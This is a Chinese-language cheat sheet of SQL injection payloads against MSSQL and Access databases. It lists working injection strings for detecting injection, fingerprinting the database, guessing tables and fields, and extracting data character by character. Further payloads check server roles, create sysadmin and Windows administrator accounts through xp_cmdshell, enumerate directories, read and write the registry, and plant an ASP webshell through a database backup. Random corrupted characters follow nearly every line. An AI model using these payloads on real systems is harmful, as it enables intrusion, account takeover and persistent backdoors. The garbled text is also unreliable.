1.判断是否有注入;and 1=1 ;and 1=2 7!Q�X�h;u�
2.初步判断是否是mssql ;and user>0 H f�mM�f^c
B�rH��`:Dw
3.注入参数是字符'and [查询条件] and ''=' }�Us�$y0W\
@�snLE?g j
4.搜索时没过滤参数的'and [查询条件] and '%25'=' x�`|tT%q@l
��]e3}�9.�
5.判断数据库系统 �u�C8�T�!z
��0�Ukl#�6
;and (select count(*) from sysobjects)>0 mssql W&re;?Z{ke
Q9'p3"y�oE
;and (select count(*) from msysobjects)>0 access $�4~}_ph�i
-H]f�@|AOw
`\Fj���O"
@�IKe<{�w�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8LM��1oal}
C5n=2luI_�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �Oj|p`Dzh�
lL+�^n�~g�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �TXOW�/{B
Dp |FyP_w�
9.(1)猜字段的ascii值(access) E�Q`t:jc�{
�r#Oz0�=0u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 DO,&Foh�\�
Ak-7�}��i�
(2)猜字段的ascii值(mssql) >�mDub��P
s/�&]gj��"
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 o�b�5nk�^y
�I!0�+RP(�
10.测试权限结构(mssql) G�pQF��* x
:H8L��(BsI
%+W
>+xRb�
/�F9lW�}pd
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- %IX���W|mi
%L|b�F"K5;
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��$U.'K!�B
�*t*&Q /�W
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- r%mTOL�ef�
\B ^sJ�[�n
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �G+^$�JN�=
|Ie��`L("�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- h�BS�J��EP
�e�;u�8G/�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ���4�W-�+k
->9��xw���
;and 1=(select IS_MEMBER('db_owner'));-- �"@?�kxRn!
Nn���7@+g)
8�t��
�\>�
A|�OC?N�ZY
11.添加mssql和系统的帐户 [�j�n;�|
3
Bi��Ca "��
;exec master.dbo.sp_addlogin username;-- �Sg�~A�'dG
;exec master.dbo.sp_password null,username,password;-- ���M@@O50~
oi4��W�xcj
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- _�V���f|F�
�0!\q�����
;exec master.dbo.xp_cmdshell 'net user username password 7Cp_�41._�
^�aWNtY'
:
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- n�L20}"$E
O�;�t?�@!_
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 9+�Hb`���
~�*�]`XL.-
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 0lh6b3t�dP
��yC*B�OJS
zW`ko�RH�@
U+M?<4J)�"
12.(1)遍历目录 eyjUN�Heh#
:A�iu�!�}\
;create table dirs(paths varchar(100), id int) �p+D�6Z'B�
��t? J�a q
;insert dirs exec master.dbo.xp_dirtree 'c:\' %Z0S"B �3
ov>�L-���
;and (select top 1 paths from dirs)>0 BtApl)��q#
Gl�D'�?Mk1
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) s����hvcc
<&Xq`�i/(�
��~o5iCt;w
PzkXrDlB7
(2)遍历目录 fsuvg� jlE
yyD�BW`V((
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- -s� �"$I:v
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �xm��x;�tq
VjM�uU"++@
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �6+#cy��Kj
B;_�3IHMO
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 $��zi\ /Yw
SnU{ZGR>sP
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �0�� d��]G
^ w1R"qE"m
a/��#,Y<kJ
�U�H|.@7w�
13.mssql中的存储过程 BQg]$�Tr?�
�}"��k(kH�
xp_regenumvalues 注册表根键, 子键 HNT8��~s.2
Y\\�nJ�uJo
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 RyD$4jk+T"
H2cc).8��"
xp_regread 根键,子键,键值名 Isb^~c�_�P
Ih"Ol(W��
;exec xp_regread �-� Sgp,"a
�.w)t<7� y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 %;?��3�A�#
Z`t?kXDNoI
xp_regwrite 根键,子键, 值名, 值类型, 值 ��E=trJge�
�6LQ�O>�k�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ZfikNQU9r
���Mp=+*I[
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 R���t�L'fd
VNXVuM )c�
xp_regdeletevalue 根键,子键,值名 �nP31jm+�A
j-|0&X��1C
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 X\�RTHlw']
"r+<=JU>OV
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �"ukbqdKD
�e[!>ezaIY
e�O G%6C%a
R���VnYe='
14.mssql的backup创建webshell �o#6�}?g.�
6P|�n�e�b}
use model oFp&j@`k8j
�sAlgp2�-
create table cmd(str image); ztpb/9��J9
[�L^#�<@S
insert into cmd(str) values (''); k({8C`&tK/
&�r%3)Z8Et
backup database model to disk='c:\l.asp'; �UC@�"<$'C
pC8i�&�_A�
`_`,XkpzCJ
ic�#�drpl,
15.mssql内置函数
@e�Wx4bl�
_R6> �Ayw*
;and (select @@version)>0 获得Windows的版本号 1[�]�cMy�V
DUr1�s]+P�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �~]W8NaQB(
�_jz=BRO�$
;and (select user_name())>0 爆当前系统的连接用户 M c��z��Wg
k�#n=mm'N9
;and (select db_name())>0 得到当前连接的数据库 ��m
Y0C7�i
h6t>�yC��\
v2��V1&-��
eG�il`:JY"
16.简洁的webshell �.���Y�RSd
�(��6{
VMQ
use model jF�f�k�i.H
wQc��� w#
create table cmd(str image); M-gjS6c\3
8�>9+w/DL�
insert into cmd(str) values (''); u'p J�9>sC
X;NT��z75�
backup database model to disk='g:\wwwtest\l.asp';
